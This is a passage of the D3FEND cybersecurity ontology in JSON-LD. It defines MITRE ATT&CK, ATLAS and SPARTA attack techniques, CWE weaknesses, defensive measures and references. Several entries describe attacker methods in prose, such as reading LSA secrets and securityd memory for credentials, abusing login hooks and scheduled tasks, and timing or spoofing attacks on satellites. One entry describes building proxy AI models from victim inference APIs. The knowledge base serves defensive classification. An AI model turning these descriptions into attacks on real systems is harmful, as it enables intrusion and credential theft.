      "d3f:definition": "Adversaries may bypass process and/or signature-based defenses by proxying execution of malicious content with signed, or otherwise trusted, binaries. Binaries used in this technique are often Microsoft-signed files, indicating that they have been either downloaded from Microsoft or are already native in the operating system.(Citation: LOLBAS Project) Binaries signed with trusted digital certificates can typically execute on Windows systems protected by digital signature validation. Several Microsoft signed binaries that are default on Windows installations can be used to proxy execution of other files or commands.",
      "rdfs:label": "System Binary Proxy Execution",
      "rdfs:subClassOf": {
        "@id": "d3f:DefenseEvasionTechnique"
      }
    },
    {
      "@id": "d3f:CWE-27",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-27",
      "d3f:definition": "The product uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize multiple internal \"../\" sequences that can resolve to a location that is outside of that directory.",
      "rdfs:label": "Path Traversal: 'dir/../../filename'",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-23"
      }
    },
    {
      "@id": "d3f:ElectronicCombinationLock",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A system comprised of an automatic door closer on the door, an input device, a controlling device, and a lock, usually mechanical, which is released or activated when the correct combination is entered or correct token is presented.",
      "d3f:uses": {
        "@id": "d3f:Password"
      },
      "rdfs:isDefinedBy": "NRC Regulatory Guide 5.12 Rev1",
      "rdfs:label": "Electronic Combination Lock",
      "rdfs:seeAlso": {
        "@id": "dbr:Electronic_lock"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CombinationLock"
        },
        {
          "@id": "d3f:HardwareDevice"
        },
        {
          "@id": "_:Ne61eee496cca4d3f985f7bd864dd26f9"
        }
      ]
    },
    {
      "@id": "_:Ne61eee496cca4d3f985f7bd864dd26f9",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:uses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Password"
      }
    },
    {
      "@id": "d3f:LinuxPtraceArgumentPTRACESETREGS",
      "@type": "owl:Class",
      "d3f:definition": "Modify the tracee's general-purpose or floating-point registers, respectively, from the address data in the tracer.",
      "rdfs:isDefinedBy": {
        "@id": "https://man7.org/linux/man-pages/man2/ptrace.2.html"
      },
      "rdfs:label": "Linux Ptrace Argument PTRACE_SETREGS",
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPISetRegisters"
      }
    },
    {
      "@id": "d3f:EX-0018.02",
      "@type": "owl:Class",
      "d3f:attack-id": "EX-0018.02",
      "d3f:definition": "A high-powered laser can be used to permanently or temporarily damage critical satellite components (i.e. solar arrays or optical centers). If directed toward a satellite’s optical center, the attack is known as blinding or dazzling. Blinding, as the name suggests, causes permanent damage to the optics of a satellite. Dazzling causes temporary loss of sight for the satellite. While there is clear attribution of the location of the laser at the time of the attack, the lasers used in these attacks may be mobile, which can make attribution to a specific actor more difficult because the attacker does not have to be in their own nation, or even continent, to conduct such an attack. Only the satellite operator will know if the attack is successful, meaning the attacker has limited confirmation of success, as an attacked nation may not choose to announce that their satellite has been attacked or left vulnerable for strategic reasons. A high-powered laser attack can also leave the targeted satellite disabled and uncontrollable, which could lead to collateral damage if the satellite begins to drift. A higher-powered laser may permanently damage a satellite by overheating its parts. The parts most susceptible to this are satellite structures, thermal control panels, and solar panels.*\n\n*https://aerospace.csis.org/aerospace101/counterspace-weapons-101",
      "rdfs:label": "High-Powered Laser - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0018/02/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:EX-0018"
      },
      "skos:prefLabel": "High-Powered Laser"
    },
    {
      "@id": "d3f:T1037.002",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1037.002",
      "d3f:definition": "Adversaries may use a Login Hook to establish persistence executed upon user logon. A login hook is a plist file that points to a specific script to execute with root privileges upon user logon. The plist file is located in the <code>/Library/Preferences/com.apple.loginwindow.plist</code> file and can be modified using the <code>defaults</code> command-line utility. This behavior is the same for logout hooks where a script can be executed upon user logout. All hooks require administrator permissions to modify or create hooks.(Citation: Login Scripts Apple Dev)(Citation: LoginWindowScripts Apple Dev)",
      "d3f:modifies": {
        "@id": "d3f:UserInitScript"
      },
      "rdfs:label": "Login Hook",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1037"
        },
        {
          "@id": "_:Ncef97a5e3a634c3e9ba42fbf9a587189"
        }
      ]
    },
    {
      "@id": "_:Ncef97a5e3a634c3e9ba42fbf9a587189",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserInitScript"
      }
    },
    {
      "@id": "d3f:Reference-SystemAndMethodForNetworkSecurityIncludingDetectionOfAttacksThroughPartnerWebsites_EMCIPHoldingCoLLC",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20110302653A1/en?oq=US+20110302653+A1"
      },
      "d3f:kb-abstract": "A computer readable storage medium has instructions for execution on a computer. The instructions monitor transactions between a server and a set of clients. An evaluation of session indicators associated with the transactions is performed. Individual sessions between the server and individual clients of the plurality of clients are isolated in response to the evaluation.",
      "d3f:kb-author": "Matt Frantz; Andreas Wittenstein; Mike Eynon; Laura Mather; Jim Lloyd; James Schumacher; Duane Murphy",
      "d3f:kb-mitre-analysis": "This patent describes a technique for detecting man-in-the-browser attacks. Current user session data is compared with the average user session that is based on collected data representing average values across all user sessions over a data-collection period. User session data includes average time between clicks and the order in which website pages are viewed. The comparisons are combined to generate a score that indicates the likelihood that the current session is a man-in-the-browser attack.",
      "d3f:kb-organization": "EMC IP Holding Co LLC",
      "d3f:kb-reference-of": {
        "@id": "d3f:WebSessionActivityAnalysis"
      },
      "d3f:kb-reference-title": "System and Method for Network Security Including Detection of Attacks Through Partner Websites",
      "rdfs:label": "Reference - System and Method for Network Security Including Detection of Attacks Through Partner Websites - EMC IP Holding Co LLC"
    },
    {
      "@id": "d3f:pref-label",
      "@type": "owl:AnnotationProperty",
      "d3f:definition": "x pref-label y: The preferred display value for x is y in d3fend tools.",
      "rdfs:label": "pref-label",
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-annotation"
      }
    },
    {
      "@id": "d3f:ContentValidation",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:ContentValidation"
      ],
      "d3f:d3fend-id": "D3-CV",
      "d3f:definition": "Verify and validate contents complies with policy",
      "d3f:kb-article": "## How it works\n\nTo ensure that content is safe, it's composition must be validated according to its content policy.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-FileSecurityUsingFileFormatValidation_OPSWATInc"
      },
      "rdfs:label": "Content Validation",
      "rdfs:subClassOf": {
        "@id": "d3f:ContentFiltering"
      }
    },
    {
      "@id": "d3f:M1016",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseMitigation"
      ],
      "d3f:d3fend-comment": "Future D3FEND releases will model the scanning and inventory domains.",
      "rdfs:label": "Vulnerability Scanning"
    },
    {
      "@id": "d3f:PhysicalLinkUpEvent",
      "@type": "owl:Class",
      "d3f:definition": "Auto-negotiation and signal detection complete; carrier is present and the link can forward frames.",
      "rdfs:label": "Physical Link Up Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PhysicalLinkEvent"
        },
        {
          "@id": "_:N8e6c029b18044bc8a877d713fe35e06d"
        },
        {
          "@id": "_:N35f546fa8aea4747b893c1791cddf9f0"
        }
      ]
    },
    {
      "@id": "_:N8e6c029b18044bc8a877d713fe35e06d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:PhysicalLinkConnectEvent"
      }
    },
    {
      "@id": "_:N35f546fa8aea4747b893c1791cddf9f0",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:precedes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:PhysicalLinkDownEvent"
      }
    },
    {
      "@id": "d3f:T1611",
      "@type": "owl:Class",
      "d3f:attack-id": "T1611",
      "d3f:definition": "Adversaries may break out of a container to gain access to the underlying host. This can allow an adversary access to other containerized resources from the host level or to the host itself. In principle, containerized resources should provide a clear separation of application functionality and be isolated from the host environment.(Citation: Docker Overview)",
      "rdfs:label": "Escape to Host",
      "rdfs:subClassOf": {
        "@id": "d3f:PrivilegeEscalationTechnique"
      }
    },
    {
      "@id": "d3f:CWE-413",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-413",
      "d3f:definition": "The product does not lock or does not correctly lock a resource when the product must have exclusive access to the resource.",
      "rdfs:label": "Improper Resource Locking",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-667"
      }
    },
    {
      "@id": "d3f:UnixHardLink",
      "@type": "owl:Class",
      "d3f:definition": "A Unix hard link is a hard link on a Unix file system.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Hard_link"
      },
      "rdfs:label": "Unix Hard Link",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:HardLink"
        },
        {
          "@id": "d3f:UnixLink"
        }
      ]
    },
    {
      "@id": "d3f:T1053.005",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1053.005",
      "d3f:definition": "Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code. There are multiple ways to access the Task Scheduler in Windows. The [schtasks](https://attack.mitre.org/software/S0111) utility can be run directly on the command line, or the Task Scheduler can be opened through the GUI within the Administrator Tools section of the Control Panel.(Citation: Stack Overflow) In some cases, adversaries have used a .NET wrapper for the Windows Task Scheduler, and alternatively, adversaries have used the Windows netapi32 library and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) (WMI) to create a scheduled task. Adversaries may also utilize the Powershell Cmdlet `Invoke-CimMethod`, which leverages WMI class `PS_ScheduledTask` to create a scheduled task via an XML path.(Citation: Red Canary - Atomic Red Team)",
      "d3f:executes": {
        "@id": "d3f:ScheduledJob"
      },
      "rdfs:label": "Scheduled Task",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1053"
        },
        {
          "@id": "_:Nf1f46fd4ae444f4b9bed4eb96690e557"
        }
      ]
    },
    {
      "@id": "_:Nf1f46fd4ae444f4b9bed4eb96690e557",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:executes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ScheduledJob"
      }
    },
    {
      "@id": "d3f:T1555.002",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": {
        "@id": "d3f:In-memoryPasswordStore"
      },
      "d3f:attack-id": "T1555.002",
      "d3f:definition": "An adversary with root access may gather credentials by reading `securityd`’s memory. `securityd` is a service/daemon responsible for implementing security protocols such as encryption and authorization.(Citation: Apple Dev SecurityD) A privileged adversary may be able to scan through `securityd`'s memory to find the correct sequence of keys to decrypt the user’s logon keychain. This may provide the adversary with various plaintext passwords, such as those for users, WiFi, mail, browsers, certificates, secure notes, etc.(Citation: OS X Keychain)(Citation: OSX Keydnap malware)",
      "rdfs:label": "Securityd Memory",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1555"
        },
        {
          "@id": "_:Nada5a8c3e91c44e4b33cdbd06adee20b"
        }
      ]
    },
    {
      "@id": "_:Nada5a8c3e91c44e4b33cdbd06adee20b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:In-memoryPasswordStore"
      }
    },
    {
      "@id": "d3f:T1424",
      "@type": "owl:Class",
      "d3f:attack-id": "T1424",
      "d3f:definition": "Adversaries may attempt to get information about running processes on a device. Information obtained could be used to gain an understanding of common software/applications running on devices within a network. Adversaries may use the information from [Process Discovery](https://attack.mitre.org/techniques/T1424) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.",
      "rdfs:label": "Process Discovery - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileDiscoveryTechnique"
      },
      "skos:prefLabel": "Process Discovery"
    },
    {
      "@id": "d3f:T1560.003",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1560.003",
      "d3f:creates": {
        "@id": "d3f:CustomArchiveFile"
      },
      "d3f:definition": "An adversary may compress or encrypt data that is collected prior to exfiltration using a custom method. Adversaries may choose to use custom archival methods, such as encryption with XOR or stream ciphers implemented with no external library or utility references. Custom implementations of well-known compression algorithms have also been used.(Citation: ESET Sednit Part 2)",
      "rdfs:label": "Archive via Custom Method",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1560"
        },
        {
          "@id": "_:N7ce2d56bcc3043d1a238a29026495c22"
        }
      ]
    },
    {
      "@id": "_:N7ce2d56bcc3043d1a238a29026495c22",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:creates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CustomArchiveFile"
      }
    },
    {
      "@id": "d3f:CWE-186",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-186",
      "d3f:definition": "A regular expression is overly restrictive, which prevents dangerous values from being detected.",
      "rdfs:label": "Overly Restrictive Regular Expression",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-185"
      }
    },
    {
      "@id": "d3f:Reference-HowTrustRelationshipsWorkForResourceForestsInAzureActiveDirectoryDomainServices",
      "@type": [
        "owl:NamedIndividual",
        "d3f:InternetArticleReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://docs.microsoft.com/en-us/azure/active-directory-domain-services/concepts-forest-trust"
      },
      "d3f:kb-abstract": "Active Directory Domain Services (AD DS) provides security across multiple domains or forests through domain and forest trust relationships. Before authentication can occur across trusts, Windows must first check if the domain being requested by a user, computer, or service has a trust relationship with the domain of the requesting account.",
      "d3f:kb-author": "Microsoft",
      "d3f:kb-reference-of": {
        "@id": "d3f:DomainTrustPolicy"
      },
      "d3f:kb-reference-title": "How trust relationships work for resource forests in Azure Active Directory Domain Services",
      "rdfs:label": "Reference - How trust relationships work for resource forests in Azure Active Directory Domain Services"
    },
    {
      "@id": "d3f:AML.T0005",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0005",
      "d3f:definition": "Adversaries may obtain models to serve as proxies for the target model in use at the victim organization.\nProxy models are used to simulate complete access to the target model in a fully offline manner.\n\nAdversaries may train models from representative datasets, attempt to replicate models from victim inference APIs, or use available pre-trained models.",
      "rdfs:label": "Create Proxy AI Model - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0005"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASAIAttackStagingTechnique"
      },
      "skos:prefLabel": "Create Proxy AI Model"
    },
    {
      "@id": "d3f:CWE-1113",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1113",
      "d3f:definition": "The source code uses comment styles or formats that are inconsistent or do not follow expected standards for the product.",
      "rdfs:label": "Inappropriate Comment Style",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1078"
      }
    },
    {
      "@id": "d3f:EX-0008.02",
      "@type": "owl:Class",
      "d3f:attack-id": "EX-0008.02",
      "d3f:definition": "Execution is keyed to elapsed time since a reference event. The implant latches a start point, boot, reset, safing entry/exit, receipt of a particular telemetry/command pattern, achievement of sun-pointing, and arms a countdown or set of offsets (“N seconds after event,” “repeat every M cycles”). Relative sequences are resilient to clock discontinuities and mirror how many spacecraft schedule internal activities (e.g., after boot, run calibrations; after acquisition, start downlink). An attacker exploits this to ensure the trigger fires only within specific operational phases and to survive resets that would thwart absolute timestamps: after every reboot, wait for housekeeping steady state, then act; or, after a wheel unload completes, inject an additional command while control laws are in a known configuration.",
      "rdfs:label": "Relative Time Sequences - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0008/02/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:EX-0008"
      },
      "skos:prefLabel": "Relative Time Sequences"
    },
    {
      "@id": "d3f:T1421",
      "@type": "owl:Class",
      "d3f:attack-id": "T1421",
      "d3f:definition": "Adversaries may attempt to get a listing of network connections to or from the compromised device they are currently accessing or from remote systems by querying for information over the network.",
      "rdfs:label": "System Network Connections Discovery - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileDiscoveryTechnique"
      },
      "skos:prefLabel": "System Network Connections Discovery"
    },
    {
      "@id": "d3f:ResourceFork",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "The resource fork is a fork or section of a file on Apple's classic Mac OS operating system, which was also carried over to the modern macOS for compatibility, used to store structured data along with the unstructured data stored within the data fork.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Resource_fork"
      },
      "rdfs:label": "Resource Fork",
      "rdfs:subClassOf": {
        "@id": "d3f:FileSection"
      }
    },
    {
      "@id": "d3f:T1591.003",
      "@type": "owl:Class",
      "d3f:attack-id": "T1591.003",
      "d3f:definition": "Adversaries may gather information about the victim's business tempo that can be used during targeting. Information about an organization’s business tempo may include a variety of details, including operational hours/days of the week. This information may also reveal times/dates of purchases and shipments of the victim’s hardware and software resources.",
      "rdfs:label": "Identify Business Tempo",
      "rdfs:subClassOf": {
        "@id": "d3f:T1591"
      }
    },
    {
      "@id": "d3f:EX-0014",
      "@type": "owl:Class",
      "d3f:attack-id": "EX-0014",
      "d3f:definition": "The adversary forges inputs that subsystems treat as trustworthy truth, time tags, sensor measurements, bus messages, or navigation signals, so onboard logic acts on fabricated reality. Because many control loops and autonomy rules assume data authenticity once it passes basic sanity checks, carefully shaped spoofs can trigger mode transitions, safing, actuator commands, or payload behaviors without touching flight code. Spoofing may occur over RF (e.g., GNSS, crosslinks, TT&C beacons), over internal networks/buses (message injection with valid identifiers), or at sensor/actuator interfaces (electrical/optical stimulation that produces plausible readings). Effects range from subtle bias (drifting estimates, skewed calibrations) to acute events (unexpected slews, power reconfiguration, recorder re-indexing), and can also pollute downlinked telemetry or science products so ground controllers interpret a false narrative. The hallmark is that the spacecraft chooses the adversary’s action path because the forged data passes through normal processing chains.",
      "rdfs:label": "Spoofing - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0014/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTAExecutionTechnique"
      },
      "skos:prefLabel": "Spoofing"
    },
    {
      "@id": "d3f:OTTestCommand",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Commands a  device to run a program in Test mode.",
      "d3f:modifies": {
        "@id": "d3f:OTControllerOperatingMode"
      },
      "rdfs:comment": [
        "BACnet: deviceCommunicationControl\nBACnet: reinitializeDevice ",
        "GE-SRTP: SET PLC (RUN VS STOP)"
      ],
      "rdfs:label": "OT Test Command",
      "rdfs:seeAlso": [
        {
          "@id": "https://icscsi.org/library/Documents/ICS_Protocols/Control%20Microsystems%20-%20DNP3%20User%20and%20Reference%20Manual.pdf"
        },
        {
          "@id": "https://modbus.org/docs/Modbus_Application_Protocol_V1_1b3.pdf"
        },
        {
          "@id": "https://nvlpubs.nist.gov/nistpubs/TechnicalNotes/NIST.TN.2023.pdf"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTModifyDeviceOperatingModeCommand"
        },
        {
          "@id": "_:N5a211cbfd8aa460da2261e4575340e8b"
        }
      ]
    },
    {
      "@id": "_:N5a211cbfd8aa460da2261e4575340e8b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTControllerOperatingMode"
      }
    },
    {
      "@id": "d3f:windows-registry-data-property",
      "@type": "owl:DatatypeProperty",
      "d3f:definition": "x windows-registry-data-property y: The windows registry entry x has the property y.",
      "rdfs:label": "windows-registry-data-property",
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-artifact-data-property"
      }
    },
    {
      "@id": "d3f:T0815",
      "@type": "owl:Class",
      "d3f:attack-id": "T0815",
      "d3f:definition": "Adversaries may cause a denial of view in attempt to disrupt and prevent operator oversight on the status of an ICS environment. This may manifest itself as a temporary communication failure between a device and its control source, where the interface recovers and becomes available once the interference ceases. (Citation: Corero) (Citation: Michael J. Assante and Robert M. Lee) (Citation: Tyson Macaulay)",
      "rdfs:label": "Denial of View - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSImpactTechnique"
      },
      "skos:prefLabel": "Denial of View"
    },
    {
      "@id": "d3f:RD-0005.01",
      "@type": "owl:Class",
      "d3f:attack-id": "RD-0005.01",
      "d3f:definition": "Rather than “owning a pad,” a realistic path is purchasing launch services (rideshare, hosted payload) to place inspection or relay assets where they confer RF, optical, or proximity advantage. Launch providers deliver integration, testing, and scheduling; an actor can use benign mission covers to field small satellites that measure local spectrum, perform on-orbit characterization of target emissions, or support later rendezvous and proximity operations. The resource being developed is access to vantage points, not just spaceflight hardware.",
      "rdfs:label": "Launch Services - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/RD-0005/01/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:RD-0005"
      },
      "skos:prefLabel": "Launch Services"
    },
    {
      "@id": "d3f:CWE-477",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-477",
      "d3f:definition": "The code uses deprecated or obsolete functions, which suggests that the code has not been actively reviewed or maintained.",
      "rdfs:label": "Use of Obsolete Function",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-710"
      }
    },
    {
      "@id": "d3f:Reference-CAR-2020-04-001%3AShadowCopyDeletion_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2020-04-001/"
      },
      "d3f:kb-abstract": "The Windows Volume Shadow Copy Service is a built-in OS feature that can be used to create backup copies of files and volumes.\n\nAdversaries may delete these shadow copies, typically through the usage of system utilities such as vssadmin.exe or wmic.exe, in order prevent file and data recovery. This technique is commonly employed for this purpose by ransomware.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessSpawnAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2020-04-001: Shadow Copy Deletion",
      "rdfs:label": "Reference - CAR-2020-04-001: Shadow Copy Deletion - MITRE"
    },
    {
      "@id": "d3f:Application-basedProcessIsolation",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:Application-basedProcessIsolation"
      ],
      "d3f:d3fend-id": "D3-ABPI",
      "d3f:definition": "Application code which prevents its own subroutines from accessing intra-process / internal memory space.",
      "d3f:isolates": {
        "@id": "d3f:Process"
      },
      "d3f:kb-article": "## How it works\nSome applications implement logic to permit or deny a particular subroutine access to other data within the same applicaition process. This is intended to prevent critical application process data from being tampered with.\n\n### Application-based Process Isolation in web browsers.\n\nIsolation in browsers usually is designed with the following architectural mindset:\n* Sandboxes and web resources should not be allowed to access each other because compromise of one should not effect the other.\n* The principle of least-privilege should be followed when browsing.\nThe following aspects help make browser-based process isolation possible:\n* Same Origin Policy\n* Separate tabs and iframes use their own DOMs (cross-site document object models always run as a different process)\n* CORS ensures cross-site data is not delivered to a process unless the server allows it\n* Cookie and local data storage is separated by domain/site\n* Separate execution environments (threads)\n\n## Considerations\n- Using isolation in browsers does mitigate and protect by default some types of attacks (e.g. renderer attacks and access to the filesystem) but it depends on correct configuration of CORS, use of valid/appropriate certificates.\n-  Application-based Process Isolation may increase memory footprint.\n-  Application-based Process Isolation may decrease application performance.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-PrivateApplicationAccessWithBrowserIsolation"
        },
        {
          "@id": "d3f:Reference-ProtectingWebApplicationsFromUntrustedEndpointsUsingRemoteBrowserIsolation"
        },
        {
          "@id": "d3f:Reference-SiteIsolationDesignDocument"
        }
      ],
      "d3f:restricts": {
        "@id": "d3f:Subroutine"
      },
      "d3f:synonym": [
        "Browser-based Process Isolation",
        "Remote Browser Isolation",
        "Sandbox"
      ],
      "rdfs:label": "Application-based Process Isolation",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ExecutionIsolation"
        },
        {
          "@id": "_:N4322d28a54b747ceab8e77d7f28c277a"
        },
        {
          "@id": "_:N4dee107304db4a9daf28468fa2ced065"
        }
      ]
    },
    {
      "@id": "_:N4322d28a54b747ceab8e77d7f28c277a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:isolates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Process"
      }
    },
    {
      "@id": "_:N4dee107304db4a9daf28468fa2ced065",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:restricts"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Subroutine"
      }
    },
    {
      "@id": "d3f:T1648",
      "@type": "owl:Class",
      "d3f:attack-id": "T1648",
      "d3f:definition": "Adversaries may abuse serverless computing, integration, and automation services to execute arbitrary code in cloud environments. Many cloud providers offer a variety of serverless resources, including compute engines, application integration services, and web servers.",
      "rdfs:label": "Serverless Execution",
      "rdfs:subClassOf": {
        "@id": "d3f:ExecutionTechnique"
      }
    },
    {
      "@id": "d3f:Reference-Securing_Web_Transactions__TLS_Server_Certificate_Management_Appendix_A_Passive_Inspection",
      "@type": [
        "owl:NamedIndividual",
        "d3f:GuidelineReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://www.nccoe.nist.gov/publication/1800-16/VolD/vol-d-appendix.html"
      },
      "d3f:kb-abstract": "The example implementation demonstrates the ability to perform passive inspection of encrypted TLS connections. The question of whether or not to perform such an inspection is complex. There are important tradeoffs between traffic security and traffic visibility that each organization should consider. Some organizations prefer to decrypt internal TLS traffic, so it can be inspected to detect attacks that may be hiding within encrypted connections. Such inspection can detect intrusion, malware, and fraud, and can conduct troubleshooting, forensics, and performance monitoring. For these organizations, TLS inspection may serve as both a standard practice and a critical component of their threat detection and service assurance strategies.",
      "d3f:kb-author": "NIST",
      "d3f:kb-reference-of": {
        "@id": "d3f:PassiveCertificateAnalysis"
      },
      "d3f:kb-reference-title": "Securing Web Transactions TLS Server Certificate Management - Appendix A Passive Inspection",
      "rdfs:label": "Reference - Securing Web Transactions TLS Server Certificate Management - Appendix A Passive Inspection"
    },
    {
      "@id": "d3f:M1055",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseMitigation"
      ],
      "rdfs:label": "Do Not Mitigate"
    },
    {
      "@id": "d3f:T1003.004",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1003.004",
      "d3f:definition": "Adversaries with SYSTEM access to a host may attempt to access Local Security Authority (LSA) secrets, which can contain a variety of different credential materials, such as credentials for service accounts.(Citation: Passcape LSA Secrets)(Citation: Microsoft AD Admin Tier Model)(Citation: Tilbury Windows Credentials) LSA secrets are stored in the registry at <code>HKEY_LOCAL_MACHINE\\SECURITY\\Policy\\Secrets</code>. LSA secrets can also be dumped from memory.(Citation: ired Dumping LSA Secrets)",
      "d3f:may-access": [
        {
          "@id": "d3f:Process"
        },
        {
          "@id": "d3f:SystemPasswordDatabase"
        }
      ],
      "rdfs:label": "LSA Secrets",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1003"
        },
        {
          "@id": "_:N5903ef6779984ccf82aa0e0419a201be"
        },
        {
          "@id": "_:Nefcbe403bca7418fb6d9caf0c960bd8b"
        }
      ]
    },
    {
      "@id": "_:N5903ef6779984ccf82aa0e0419a201be",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-access"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Process"
      }
    },
    {
      "@id": "_:Nefcbe403bca7418fb6d9caf0c960bd8b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-access"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemPasswordDatabase"
      }
    },
    {
      "@id": "d3f:DisplayAdapter",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A graphics card (also called a display card, video card, display adapter, or graphics adapter) is an expansion card which generates a feed of output images to a display device (such as a computer monitor). Frequently, these are advertised as discrete or dedicated graphics cards, emphasizing the distinction between these and integrated graphics. At the core of both is the graphics processing unit (GPU), which is the main part that does the actual computations, but should not be confused with the video card as a whole, although \"GPU\" is often used to refer to video cards.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Video_card"
      },
      "rdfs:label": "Display Adapter",
      "rdfs:subClassOf": {
        "@id": "d3f:OutputDevice"
      },
      "skos:altLabel": [
        "Display Card",
        "Graphics Adapter",
        "Video Card"
      ]
    },
    {
      "@id": "d3f:EX-0001.02",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "EX-0001.02",
